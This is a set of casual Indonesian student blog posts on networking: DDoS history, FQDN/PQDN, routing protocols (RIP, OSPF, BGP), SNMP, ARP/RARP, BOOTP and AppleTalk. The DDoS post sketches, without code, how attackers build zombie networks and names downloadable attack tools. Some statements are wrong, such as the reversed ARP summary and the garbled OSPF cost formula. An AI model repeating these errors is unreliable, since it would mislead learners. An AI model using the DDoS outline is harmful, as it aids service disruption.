Serangan DDoS pertama kali muncul pada tahun 1999, tiga tahun setelah serangan Denial of Service yang klasik muncul, dengan menggunakan serangan SYN Flooding, yang mengakibatkan beberapa server web di Internet mengalami "downtime". Pada awal Februari 2000, sebuah serangan yang besar dilakukan sehingga beberapa situs web terkenal seperti Amazon, CNN, eBay, dan Yahoo! mengalami "downtime" selama beberapa jam. Serangan yang lebih baru lagi pernah dilancarkan pada bulan Oktober 2002 ketika 9 dari 13 root DNS Server diserang dengan menggunakan DDoS yang sangat besar yang disebut dengan "Ping Flood". Pada puncak serangan, beberapa server-server tersebut pada tiap detiknya mendapatkan lebih dari 150000 request paket Internet Control Message Protocol (ICMP). Untungnya, karena serangan hanya dilakukan selama setengah jam saja, lalu lintas Internet pun tidak terlalu terpengaruh dengan serangan tersebut (setidaknya tidak semuanya mengalami kerusakan).

Tidak seperti akibatnya yang menjadi suatu kerumitan yang sangat tinggi (bagi para administrator jaringan dan server yang melakukan perbaikan server akibat dari serangan), teori dan praktek untuk melakukan serangan DDoS justru sederhana, yakni sebagai berikut:

1. Menjalankan tool (biasanya berupa program (perangkat lunak) kecil) yang secara otomatis akan memindai jaringan untuk menemukan host-host yang rentan (vulnerable) yang terkoneksi ke Internet. Setelah host yang rentan ditemukan, tool tersebut dapat menginstalasikan salah satu jenis dari Trojan Horse yang disebut sebagai DDoS Trojan, yang akan mengakibatkan host tersebut menjadi zombie yang dapat dikontrol secara jarak jauh (bahasa Inggris: remote) oleh sebuah komputer master yang digunakan oleh si penyerang asli untuk melancarkan serangan. Beberapa tool (software} yang digunakan untuk melakukan serangan serperti ini adalah TFN, TFN2K, Trinoo, dan Stacheldraht, yang dapat diunduh (bahasa Inggris: download) secara bebas di Internet.

2. Ketika si penyerang merasa telah mendapatkan jumlah host yang cukup (sebagai zombie) untuk melakukan penyerangan, penyerang akan menggunakan komputer master untuk memberikan sinyal penyerangan terhadap jaringan target atau host target. Serangan ini umumnya dilakukan dengan menggunakan beberapa bentuk SYN Flood atau skema serangan DoS yang sederhana, tapi karena dilakukan oleh banyak host zombie, maka jumlah lalu lintas jaringan yang diciptakan oleh mereka adalah sangat besar, sehingga "memakan habis" semua sumber daya Transmission Control Protocol yang terdapat di dalam komputer atau jaringan target dan dapat mengakibatkan host atau jaringan tersebut mengalami "downtime".

Minggu, Februari 20, 2011

Pengertian FQDN dan PQDN serta perbedaannya

ok sekarang kita masuk dalam FQDN dan PQDN

trus apa FQDN dan PQDN itu? yang jelas semua berhubungan dengan DNS (Domain Name Service)
jadi yang pertama kita harus tahu adalah DNS



DNS
Untuk mengidentifikasi suatu entitas, internet menggunakan alamat IP, yang secara unik mengidentifikasi koneksi dari host ke Internet. Namun, orang lebih suka menggunakan nama daripada alamat numerik. Oleh karena itu, kita membutuhkan sebuah sistem yang dapat memetakan nama ke alamat atau alamat untuk nama. Ketika Internet kecil, pemetaan dilakukan menggunakan file host. File tuan rumah hanya memiliki dua kolom: satu untuk nama dan satu untuk alamat. Setiap host dapat menyimpan file host pada disk dan memperbaruinya secara berkala dari file host master. Ketika sebuah program atau pengguna ingin untuk memetakan nama ke alamat, host berkonsultasi dengan file host dan menemukan pemetaan.

Secara default pengertian DNS adalah
sebuah sistem yang menyimpan informasi tentang nama host nama domain dalam bentuk basis data tersebar (distributed database) di dalam jaringan komputer, misalkan: Internet. DNS menyediakan alamat IP untuk setiap nama host dan mendata setiap server transmisi surat (mail exchange server) yang menerima surat elektronik (email) untuk setiap domain.
maupun

DNS menyediakan servis yang cukup penting untuk Internet, bilamana perangkat keras komputer dan jaringan bekerja dengan alamat IP untuk mengerjakan tugas seperti pengalamatan dan penjaluran (routing), manusia pada umumnya lebih memilih untuk menggunakan nama host dan nama domain, contohnya adalah penunjukan sumber universal (URL) dan alamat email. DNS menghubungkan kebutuhan ini. Jadi penjelasan singkatnya ialah DNS adalah sebuah layanan atau service untuk memetakan alamat IP address menjadi huruf

dan sistem penamaan DNS ada 2 yaitu FQDN dan PQDN.
lalu apa itu FQDN dan PQDN?
ayo kita simak

FQDN
Fully Qualifed Domain Name (disingkat menjadi FQDN), dalam sistem penamaan domain Domain Name System (DNS) merujuk kepada nama bertitik yang dapat mengidentifikasikan sebuah host Transmission Control Protocol/Internet Protocol (TCP/IP) di dalam jaringan dan Internet. FQDN juga sering disebut sebagai Absolute Domain Name. FQDN didiskusikan dalam RFC 1035, RFC 1123 dan RFC 2181.

Sebuah FQDN dari sebuah host mengandung nama host miliknya digabungkan dengan nama domain (dan subdomain) di mana host tersebut berada, yang kemudian dipisahkan dengan menggunakan tanda titik (.). FQDN umumnya digunakan di dalam Uniform Resource Locator (URL) yang digunakan untuk mengakses halaman web di dalam jaringan dan Internet dan membuat path absolut terhadap ruang nama (namespace) DNS ke host target di mana halaman web tersebut berada. FQDN berbeda dengan nama domain biasa karena FQDN merupakan nama absolut dari domain, sehingga sufiks domain tidak perlu ditambahkan.

Contoh FQDN: untuk sebuah nama FQDN id.wikipedia.org, dapat diambil pernyataan bahwa id merupakan nama host, dan wikipedia.org merupakan nama domain-nya. Panjang maksimum dari FQDN adalah 255 bita.

PQDN
domain berkualifikasi parsial (PQDN),. A PQDN mulai dari node tapi tidak mencapai akar. Hal ini digunakan ketika nama harus diselesaikan termasuk dalam situs yang sama sebagai klien. Berikut resolver bisa menyediakan bagian yang hilang, yang disebut akhiran, untuk menciptakan sebuah FQDN.

Misalnya, jika pengguna di fhda.edu tersebut. Situs ingin mendapatkan alamat IP dari komputer penantang, ia dapat mendefinisikan nama parsial Challenger

Klien DNS atc.fhda.edu menambahkan akhiran. Sebelum melewati alamat untuk server DNS. Klien DNS biasanya memegang daftar akhiran. Berikut dapat beberapa dari daftar sufiks di De Anza College.



jadi apa beda antar keduanya?

FQDN adalah sistem penamaan di DNS yang berisi seluruh nama host serta domainnya.
PQDN adalah sistem penamaan di DNS yang hanya berisi domain saja.


terima kasih telah membaca
smoga bermanfaat

Selasa, Januari 18, 2011

Algoritma pada Router dinamis

yah banyakyang kurang tahu protokol-protokol di router dinamis itu bagaimana, karena itu kita bahas bersama (saya sendiri juga kurang tahu jadi sama-sama belajar)

Oke yang pertama yang perlu diketahui tentang algoritma router dinamis bergaris besar pada Link-state dan Distance vector.Trus apa itu? wah klo begitu kita bahas satu-satu.

Distance Vector
Algoritma yang secara periodik menyalin table routing dari router ke router. Perubahan table routing ini di-update antar router yang saling berhubungan saat terjadi perubahan topologi. Setiap router menerima table routing dari router tetangga yang terhubung secara langsung.Proses routing ini disebut juga dengan routing Bellman-Ford atau Ford-Fulkerson (nama yang nemu).
Routing vektor jarak beroperasi dengan membiarkan setiap router menjaga tabel (sebuah vektor) memberikan jarak yang terbaik yang dapat diketahui ke setiap tujuan dan
saluran yang dipakai menuju tujuan tersebut. Tabel-tabel ini di-update dengan cara saling bertukar informasi dengan router tetangga. Routing distance vektor bertujuan untuk menentukan arah atau vektor dan jarak ke link-link lain di suatu internetwork.

Link State
Algoritma link-state juga dikenal dengan algoritma Dijkstra atau algoritma shortest path first (SPF). Algoritma ini memperbaiki informasi database dari informasi topologi. Algoritma distance vector memiliki informasi yang tidak spesifik tentang distance network dan tidak mengetahui jarak router. Sedangkan algortima link-state memperbaiki pengetahuan dari jarak router dan bagaimana mereka inter-koneksi.link-state bertujuan untuk menciptakan kembali topologi yang benar pada suatu internetwork.

Secara garis besar penganut eh salah, maksud saya yang menggunakan algoritma ini adalah protokol-protokol di router dinamis.Berikut protokol dan algoritmanya :
Distance Vector
  • Routing Information Protocol (RIP)
  • Gateway-to-Gateway Protocol (GGP)
  • Exterior Gateway Protocol (EGP)
  • Interior Gateway Routing Protocol (IGRP)
Link State
  • Intermediate System -Intermediate System (IS-IS)
  • Open Shortest Path First (OSPF)

Lha terus perbedaannya dimananya? nah kita lihat dari contoh berikut ini :

Distance Vector
  • Seseorang akan menuju suatu tempat dibekali informasi arah yang harus diambil (lurus, kiri, kanan) pd setiap persimpangan.
  • Berjalan baik kalau semua jalan tidak ada yg ditutup. Bermasalah kalau ternyata ada jalan yg ditutup (yah biasa di negara kita mah begitu)
Link State
  • Seseorang akan menuju suatu tempat dibekali dengan peta (ga ada arahnya cuma ada gambar tujuannya)
  • Jika ada suatu jalan ditutup bisa mencari alternatif lain (berarti udah pinter nih algoritma, mencegah macet)

yah begitulah perbedaannya.kurang lebihnya (memang banyak kurangnya sih) mohon dimaklumi dan bisa memberikan commentnya.

terima kasih telah membaca.

Border Gateway Protocol (BGP) mbahnya protokol router dinamis

Border Gateway Protocol
Disingkat BGP adalah inti dari protokol routing Internet. Protocol ini yang menjadi backbone dari jaringan Internet dunia. BGP adalah protokol routing inti dari Internet yg digunakan untuk melakukan pertukaran informasi routing antar jaringan.

Border Gateway Protocol (BGP) merupakan protokol routing antar Autonomous System (AS). Autonomous System (AS), mengacu pada dokumen IETF RFC 1930 didefinisikan sebagai kumpulan router-router pada satu pengelolaan administrative yang menggunakan IGP sebagai protokol routing dalam AS tersebut dan menggunakan EGP sebagai protokol routing ke AS lain. Nomor AS dimulai dari 1 sampai 65535 dengan catatan nomor AS 64512 sampai 65535 digunakan sebagai nomor AS private. Walaupun BGP merupakan protokol routing EGP yang merouting paket data antar AS tetapi BGP juga mendukung proses routing paket data dalam sebuah AS. Berdasar pada nomor AS yang digunakan dalam proses routing, BGP dikategorikan menjadi dua, yaitu:
  • Internal BGP (iBGP) merupakan proses pertukaran informasi routing dalam sebuah AS.
  • Eksternal BGP (eBGP) merupakan proses pertukaran informasi routing BGP antar router-router di internet yang berbeda AS.
BGP merupakan protokol routing yang memanfaatkan TCP port 179 untuk pertukaran informasi routing antar router.

refensi : volkshymne.blogspot.com

terima kasih sudah membaca

Routing Information Protocol (RIP)

Routing information protocol (RIP)
RIP adalah protokol routing dinamik yang berbasis distance vector. RIP menggunakan
protokol UDP pada port 520 untuk mengirimkan informasi routing antar router. RIP
menghitung routing terbaik berdasarkan perhitungan HOP. RIP membutuhkan waktu untuk
melakukan converge. RIP membutuhkan power CPU yang rendah dan memory yang kecil
daripada protokol yang lainnya.

  • SEJARAH RIP
Algoritma routing yang digunakan dalam RIP, algoritma Bellman-Ford, pertama kali digunakan dalam jaringan komputer pada tahun 1968, sebagai awal dari algoritma routing ARPANET.
Versi paling awal protokol khusus yang menjadi RIP adalah Gateway Information Protocol, sebagai bagian dari PARC Universal Packet internetworking protocol suite, yang dikembangkan di Xerox Parc. Sebuah versi yang bernama Routing Information Protocol, adalah bagian dari Xerox Network Services.
Sebuah versi dari RIP yang mendukung Internet Protocol (IP) kemudian dimasukkan dalam Berkeley Software Distribution (BSD) dari sistem operasi Unix. Ini dikenal sebagai daemon routed. Berbagai vendor lainnya membuat protokol routing yang diimplementasikan sendiri. Akhirnya, RFC 1058 menyatukan berbagai implementasi di bawah satu standar.

RIP memiliki beberapa keterbatasan, antara lain:
1. METRIC: Hop Count
RIP menghitung routing terbaik berdasarkan hop count dimana belum tentu hop count
yang rendah menggunakan protokol LAN yang bagus, dan bisa saja RIP memilih jalur
jaringan yang lambat.
2. Hop Count Limit
RIP tidak dapat mengatur hop lebih dari 15. hal ini digunakan untuk mencegah loop
pada jaringan.
3. Classful Routing Only
RIP menggunakan classful routing ( /8, /16, /24 ). RIP tidak dapat mengatur classless
routing.



Ada tiga versi dari Routing Information Protocol: RIPv1, RIPv2, dan RIPng, yaitu :

  • RIP versi 1
Spesifikasi asli RIP, didefinisikan dalam RFC 1058, classful menggunakan routing. Update routing periodik tidak membawa informasi subnet, kurang dukungan untuk Variable Length Subnet Mask (VLSM). Keterbatasan ini tidak memungkinkan untuk memiliki subnet berukuran berbeda dalam kelas jaringan yang sama. Dengan kata lain, semua subnet dalam kelas jaringan harus memiliki ukuran yang sama. Juga tidak ada dukungan untuk router otentikasi, membuat RIP rentan terhadap berbagai serangan.

  • RIP versi 2
Karena kekurangan RIP asli spesifikasi, RIP versi 2 (RIPv2) dikembangkan pada tahun 1993 dan standar terakhir pada tahun 1998. Ini termasuk kemampuan untuk membawa informasi subnet, sehingga mendukung Classless Inter-Domain Routing (CIDR). Untuk menjaga kompatibilitas, maka batas hop dari 15 tetap. RIPv2 memiliki fasilitas untuk sepenuhnya beroperasi dengan spesifikasi awal jika semua protokol Harus Nol bidang dalam pesan RIPv1 benar ditentukan. Selain itu, aktifkan kompatibilitas fitur memungkinkan interoperabilitas halus penyesuaian.

Dalam upaya untuk menghindari beban yang tidak perlu host yang tidak berpartisipasi dalam routing, RIPv2 me-multicast seluruh tabel routing ke semua router yang berdekatan di alamat 224.0.0.9, sebagai lawan dari RIP yang menggunakan siaran unicast. Alamat 224.0.0.9 ini berada pada alamat IP versi 4 kelas D (range 224.0.0.0 - 239.255.255.255). Pengalamatan unicast masih diperbolehkan untuk aplikasi khusus.

(MD5) otentikasi RIP diperkenalkan pada tahun 1997.

RIPv2 adalah Standar Internet STD-56.
  • RIPng

RIPng (RIP Next Generation / RIP generasi berikutnya), yang didefinisikan dalam RFC 2080 adalah perluasan dari RIPv2 untuk mendukung IPv6, generasi Internet Protocol berikutnya.


Perbedaan utama antara RIPv2 dan RIPng adalah:

  • Dukungan dari jaringan IPv6.
  • RIPv2 mendukung otentikasi RIPv1, sedangkan RIPng tidak. IPv6 router itu, pada saat itu, seharusnya menggunakan IP Security (IPsec) untuk otentikasi.
  • * RIPv2 memungkinkan pemberian beragam tag untuk rute , sedangkan RIPng tidak;
  • RIPv2 meng-encode hop berikutnya (next-hop) ke setiap entry route, RIPng membutuhkan penyandian (encoding) tertentu dari hop berikutnya untuk satu set entry route .

referensi : volkshymne.blogspot.com


terima kasih sudah membaca

Open Shortest Path First (OSPF) dan cara kerjanya

Open Shortest Path First (OSPF)
adalah sebuah routing protokol standar terbuka yang telah di implementasikan oleh sejumlah besar vendor jaringan. OSPF bekerja dengan sebuah algoritma yang disebut Dijkstra. Open Shortest Path First (OSPF) merupakan protokol routing yang dipergunakan dalam Internet Protocol (IP) jaringan. ini adalah link-state routing protocol dan juga sebagai kelompok interior gateway protokol, yang beroperasi dalam satu sistem otonom (AS). Didefinisikan sebagai OSPF Versi 2 dalam RFC 2328 (1998) untuk IPv4. The update untuk IPv6 ditetapkan sebagai OSPF Versi 3 dalam RFC 5340 (2008). OSPF adalah mungkin yang paling banyak digunakan interior gateway protocol (IGP) di perusahaan besar jaringan.

Teknologi yang digunakan oleh routing protokol ini adalah teknologi link-state yang memang didesain untuk bekerja dengan sangat efisien dalam proses pengiriman update informasi rute.
Cara updatenya itu secara Triggered update, maksudnya tidak semua informasi yg ada di router akan dikirim seluruhnya ke router-router lainnya, tetapi hanya informasi yang berubah/bertambah/berkurang saja yang akan di kirim ke semua router dalam 1 area,
sehingga meng-efektifkan dan mengefisienkan bandwidth yg ada.

Terus prosesnya? oke kita lanjutkan ker proses bagaimana OSPF bekerja

Dasarnya, proses yang dilakukan routing protokol OSPF mulai dari awal hingga dapat saling bertukar informasi ada lima langkah. Lima langkah berikut adalah

1. Membentuk Adjacency Router


Adjacency router artinya adalah router yang bersebelahan atau yang terdekat. Jadi proses pertama dari router OSPF ini adalah menghubungkan diri dan saling berkomunikasi dengan para router terdekat atau neighbour router.

2. Memilih Designated Router (DR) dan Backup Designated Router (BDR).(jika diperlukan)

Dalam jaringan broadcast multiaccess, DR dan BDR sangatlah diperlukan. DR dan BDR akan menjadi pusat komunikasi seputar informasi OSPF dalam jaringan tersebut.

3. Mengumpulkan State-state dalam Jaringan

Setelah terbentuk hubungan antar router-router OSPF, kini saatnya untuk bertukar informasi mengenai state-state dan jalur-jalur yang ada dalam jaringan.

4. Memilih Rute Terbaik untuk Digunakan

Setelah informasi seluruh jaringan berada dalam database, maka kini saatnya untuk memilih rute terbaik untuk dimasukkan ke dalam routing table. Untuk memilih rute-rute terbaik, parameter yang digunakan oleh OSPF adalah Cost. Metrik Cost biasanya akan menggambarkan seberapa dekat dan cepatnya sebuah rute. Nilai Cost didapat dari perhitungan dengan

rumus: Cost of the link = 108 /Bandwidth

Router OSPF akan menghitung semua cost yang ada dan akan menjalankan algoritma
Shortest Path First untuk memilih rute terbaiknya. Setelah selesai, maka rute tersebut langsung dimasukkan dalam routing table dan siap digunakan untuk forwarding data.


5. Menjaga Informasi Routing Tetap Up-to-date

Ketika sebuah rute sudah masuk ke dalam routing table, router tersebut harus juga me-maintain state database-nya. Hal ini bertujuan kalau ada sebuah rute yang sudah
tidak valid, maka router harus tahu dan tidak boleh lagi menggunakannya. Ketika ada perubahan link-state dalam jaringan, OSPF router akan melakukan flooding terhadap perubahan ini. Tujuannya adalah agar seluruh router dalam jaringan mengetahui perubahan tersebut.

terima kasih telah membaca.

Minggu, Januari 16, 2011

Simple Network Management Protocol (SNMP)

kita bahas SNMP

Silakan

Simple Network Management Protocol (SNMP) adalah protokol standard industri yang digunakan untuk memonitor dan mengelola berbagai perangkat di jaringan Internet meliputi hub, router, switch, workstation dan sistem manajemen jaringan secara jarak jauh (remote).

akhir-akhri ini, Oulu University Secure Programming Group, sebuah group riset keamanan jaringan di Finlandia, telah menemukan adanya kelemahan (vulnerability) pada SNMP v1. Kelemahan tersebut memungkinkan seorang cracker memasang back door pada peralatan yang menggunakan SNMP v1 sehingga bisa menyusup ke jaringan dan melakukan apa saja terhadap jaringan. Kelemahan ditemukan pada SNMP trap and request facilities yang memungkinkan penyusup memperoleh akses ke dalam sistem yang menjalankan SNMP dan melakukan serangan Denial of Service (DoS) yang membuat sistem tidak berfungsi (down) atau tidak stabil.

SNMP v1 telah dipakai sejak awal tahun 1980-an. Terdapat berbagai usaha untuk memperbaiki standard SNMP yaitu dengan munculnya SNMP v2 dan SNMP v3 pada tahun 1998. Namun usaha ini tidak begitu berhasil. Sebagian besar jaringan saat ini masih menggunakan SNMP v1.

Masalah ini cukup merepotkan karena tidak hanya menyangkut satu jenis peralatan dari satu vendor melainkan menyangkut perangkat dari berbagai banyak vendor sehingga diperlukan patch/update dari berbagai vendor yang peralatannya menggunakan SNMP v1.

Untuk mengatasi kelemahan pada SNMP ini CERT Coordination Center (www.cert.org), suatu pusat pengembangan dan riset keamanan Internet, merekomendasikan untuk sementara menutup jalan masuk (ingress filtering) trafik SNMP pada port 161/udp dan 162/udp. Jika hal ini tidak mungkin dilakukan, CERT menyarankan untuk membatasi trafik SNMP hanya pada Virtual Private Noetwork (VPN) atau mengisolasi sistem manajemen jaringan dari jaringan publik. Penutupan port dilakukan sementara sambil menunggu dikeluarkannya pacth/update dari pihak vendor yang membuat perangkat yang menggunakan SNMP v1 tersebut.


referensi : volkshymne.blogspot.com

terima kasih.

ARP dan RARP

sebuah protokol dalam TCP/IP Protocol Suite yang bertanggungjawab dalam melakukan resolusi alamat IP ke dalam alamat Media Access Control (MAC Address). ARP didefinisikan di dalam RFC 826

ARP berasosiasi antara alamat fisik (MAC address) dan alamat IP. Pada LAN, setiap device, host, station dll diidentifikasi dalam bentuk alamat fisik yang didapat dari NIC.

Setiap host atau router yang ingin mengetahui alamat fisik daripada host atau router yang terletak dalam jaringan lokal yang sama akan mengirim paket query ARP secara broadcast, sehingga seluruh host atau router yang berada pada jaringan lokal akan menerima paket query tersebut. Kemudian setiap router atau host yang menerima paket query dari salah satu host atau router yang mengirim maka akan diproses hanya oleh host atau router yang memiliki IP yang terdapat dalam paket query ARP. Host yang menerima respons akan mengirim balik kepada pengirim query yang berisi paket berupa informasi alamat IP dan alamat fisik.

itu pengertian yang jelasnya, klo mau simpel begini :
host atau router yang mau tahu alamat fisik dari host atau router di dalam jaringan lokal yang sama mengirimkan paket query secara keseluruhan di dalam jaringan itu.Semua dapat querynya tapi hanya host atau router yang berwenang (lewat IP) yang bisa membalas balik query ARPnya.respon baliknya yaitu paket berupa alamat IP dan alamt fisik.


Ketika sebuah aplikasi yang mendukung teknologi protokol jaringan TCP/IP mencoba untuk mengakses sebuah host TCP/IP dengan menggunakan alamat IP, maka alamat IP yang dimiliki oleh host yang dituju harus diterjemahkan terlebih dahulu ke dalam MAC Address agar frame-frame data dapat diteruskan ke tujuan dan diletakkan di atas media transmisi (kabel, radio, atau cahaya), setelah diproses terlebih dahulu oleh Network Interface Card (NIC). Hal ini dikarenakan NIC beroperasi dalam lapisan fisik dan lapisan data-link pada tujuh lapis model referensi OSI dan menggunakan alamat fisik daripada menggunakan alamat logis (seperti halnya alamat IP atau nama NetBIOS) untuk melakukan komunikasi data dalam jaringan.


Jika memang alamat yang dituju berada di luar jaringan lokal, maka ARP akan mencoba untuk mendapatkan MAC address dari antarmuka router lokal yang menghubungkan jaringan lokal ke luar jaringan (di mana komputer yang dituju berada).

Sekarang RARP
Silakan

Reverse Address Resolution Protocol (RARP) adalah protokol jaringan usang komputer yang digunakan oleh komputer host untuk meminta perusahaan Internet Protocol ( IPv4 ) alamat dari suatu host administrasi, ketika telah yang tersedia Link Layer atau alamat perangkat keras, seperti MAC address.

Ia telah dianggap usang oleh Bootstrap Protocol (BOOTP) dan modern Dynamic Host Configuration Protocol (DHCP), yang mendukung kedua fitur yang jauh lebih besar daripada yang ditetapkan RARP.RARP membutuhkan satu atau lebih host server untuk memelihara database pemetaan Link Layer alamat protokol masing-masing alamat mereka. Media Access Control (MAC) alamat yang diperlukan untuk secara individual dikonfigurasi pada server oleh administrator.RARP terbatas untuk melayani hanya alamat IP .

Reverse ARP berbeda dari Inverse Address Resolution Protocol (InARP) dijelaskan dalam RFC 2390 , yang dirancang untuk mendapatkan alamat IP yang terkait dengan MAC address host lain.Sesungguhnya RARP didisain untuk memecahkan masalah mapping alamat dalam sebuah mesin/komputer di mana mesin/komputer mengetahui alamat fisiknya namun tidak mengetahui alamat logikanya.

Cara kerja RARP ini terjadi pada saat mesin seperti komputer atau router yang baru bergabung dalam jaringan lokal, kebanyakan tipe mesin yang menerapkan RARP adalah mesin yang diskless, atau tidak mempunyai aplikasi program dalam disk. RARP kemudian memberikan request secara broadcast di jaringan lokal. Mesin yang lain pada jaringan lokal yang mengetahui semua seluruh alamat IP akan akan meresponsnya dengan RARP reply secara unicast. Sebagai catatan, mesin yang merequest harus menjalankan program klien RARP, sedangkan mesin yang merespons harus menjalankan program server RARP.


Terus apa bedanya ARP dengan RARP jika begitu?
nah bedanya dari sini:

ARP
mencari alamat logika (IP) dari alamat fisik dengan mengirimkan paket query ke semua jaringan lokal, yang ditujulah yang akan memberikan balasannya kepada sang pengirim.
RARP
mencari hal yang sama dengan mengirimkan request ke dalam jaringan lokal, hos atau router yang memiliki informasi tentang IP tersebut lantas membalas RARP reply secara unicast.yah klo hostnya mau jawab ya pake program Server RARP dan yang meminta memakai program Klien RARP jadi agak ribet karena memang protokol lama.


terima kasih telah membaca.

Bootstrap (BOOTP)

kali ini kita membahas tentang BOOTP atau bootstrap

silakan


BOOTP berupa konsep protocol standart. Statusnya dianjurkan. Spesifikasi BOOTP
dapat ditemukan pada RFC 951 - Bootstrap Protocol and RFC 1497 - BOOTP Vendor
Information Extensions.

LAN memungkinkan host tanpa harddisk sebagai workstation, router, terminal
concentrator dan masih banyak lagi. Host tanpa harddisk membutuhkan mekanisme untuk
boot dengan di-remote melalui sebuah jaringan. BOOTP protocol digunakan untuk me-
remote booting melalui jaringan IP. BOOTP memperbolehkan protocol IP minimal
sehingga tidak mengganggu informasi konfigurasi yang tidak melakukan apa-apa, biasanya
disimpan di ROM, untuk mendapatkan informasi yang cukup untuk memulai proses
download dengan menggunakan kode boot yang dibutuhkan. BOOTP tidak mendefinisikan
cara untuk men-download selesai, tetapi proses ini biasanya menggunakan TFTP
sebagaimana dideskripsikan RFC 906 – Bootstrap loading menggunakan TFTP.

BOOTP memiliki kegunaan yang sama dengan DHCP, hanya BOOTP didesain
untuk manual pre-configuration dari informasi host di dalam suatu server database. BOOTP
dan DHCP didesain agar bisa route ke jaringan.
  • Kelebihan BOOTP
Bootp memiliki keunggulan antara lain:

- Nga perlu Harddisk, karena ada ethernet dan atau BOOT lan.
- punya log file sehingga saat terjadi oerror bisa dilihat di file itu.
  • Kelemahan BOOTP
Bootp memiliki kelemahan sebagai berikut:

- Haruss setting manual jadi resiko rusak jadi besar.
- Karena pake UDP, pengiriman pesan kurang nagus.
- OS jaman sekrang jarang memasukkan Bootstrap ke dalam sistemnya (yah mungkin buat OS jadul doang)

referensi volkshymne.blogspot.com (morto nuwun om)

yah cukup sekian bahasannya, biasa pakai bahasa santai.

Bootstrap (BOOTP)

Apple Talk (protokol di machintosh)

Assalamualaikum

yah kali ini kita membahas tentang Apple talk, mohon diunjuk mawon.
Apple Talk
ialah perangkat protokol pada Machintosh, protokol ini banyak melibatkan protokol lain yang saling terpadu satu sama lain.Dengan kata lain, protokol ini hanya untuk komputer machintosh.

dengan filosofi mereka bahawa machintosh itu simpel, maka protokol ini di hidden dari user agar tak ketahuan (biar keliatan praktis)

beberapa perangkat protokol yang ikut nimbrung di apple talk antara lain:

  • AppleTalk Data Stream Protocol (ADSP)
Bertugas sebagai pemantau aliran data, pengawasan data antara dua komputer berada di protokol ini.
  • AplleTalk File Protocol (AFP)
Berfungsi untuk menangani file, yah seperti read-only atau hidden itulah protokol ini ditugaskan.
  • AppleTalk Session Protocol (ASP)
protokol yang memeriksa pesan-pesan dalam bentuk bagian-bagian ini bertugas untuk mengecek apakah sudah lengkap dan validkah sebuah pesan tersebut dari bagian-bagian pesan yang ada.
  • AppleTalk Transaction Protocol (ATP)
mengecek keakuratan pesan yang dikirim ke jaringan.
  • Echo Protocol (EP)
protokol pemberi pesan bahwa pesan telah tersampaikan ini juga bertugas untuk memberitahukan bahwa pesan dikirim secara lengkap, pemberitahuan informasi yang telat, dan mengecek lalu lintas agar pesan dapat dikrim secara maksimum.
  • Name Binding Protocol (NBP)
Penerjemah node pada jaringan yang didefinisi user ke dalam sebuah alamat.
  • Page Description Language (PDL)
Himpunan fungsi yang digunakan oleh printer untuk mengontrol pemformatan teks pada kertas.
  • Routing Table Maintenance Protocol (RTMP)
Memantau lokasi node pada jaringan dan memelihara data base hubungan antara node-node tersebut. Apabila satu node mengalami kegagalan, RTMP dapat menetapkan rute alternatif.
  • Zone Information Protocol (ZIP)
Menganalisis konfigurasi jaringan dan himpunan alamat device ke dalam kelompok, atau zone guna menghasilkan akses yang efisien.

nah kira-kira cukup sudah untuk protokol apple talk.